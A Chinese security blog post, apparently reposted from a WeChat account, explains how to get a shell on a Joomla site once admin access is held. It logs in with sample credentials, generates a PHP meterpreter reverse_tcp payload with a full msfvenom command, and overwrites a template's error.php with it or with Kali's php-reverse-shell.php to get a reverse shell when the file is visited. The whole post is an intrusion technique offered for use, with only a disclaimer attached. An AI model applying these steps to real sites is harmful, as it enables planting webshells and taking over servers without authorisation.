文章前言
本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式
GetShell
Metasploit
首先我们使用site_admin/123456登录Joomla后台
在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限,这里我们随意选择一个主题
选择查看模板文件的详细信息
选择error.php文件
然后使用msfvenom来生成要给php后门文件
#PHP后门文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
然后使用我们之前在msfvenom中生成的webshell文件内容替换上面error.php文件内容
保存后访问Beez3主题下的error.php文件便可成功的突破边界
http://192.168.204.137/joomla/templates/beez3/error.php
随后在我们的MSF中获取到一个会话
GetShell-2
这里我们介绍另外一种GetShell的方法,此方法和上面的方法类似,只是用的脚本不同,我们主要通过利用Kali自带的php-reverse-shell.php来实现反弹shell的目的,文件路径为/usr/share/webshells/php/php-reverse-shell.php
随后我们直接修改模板文件的内容为上面的php-reverse-shell.php,同时修改文件中的反弹shell的地址和端口信息
随后开启监听
在WEB端访问上述的error.php文件
随后反弹shell回来
文末小结
此文仅作为Joomla后台GetShell的利用思路介绍,日常打靶机的时候Joomla遇到的可能多一些,正常的红队评估测试中外网少之又少,很少见到~
原文始发于微信公众号(七芒星实验室):Joomla后台模板Getshell技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论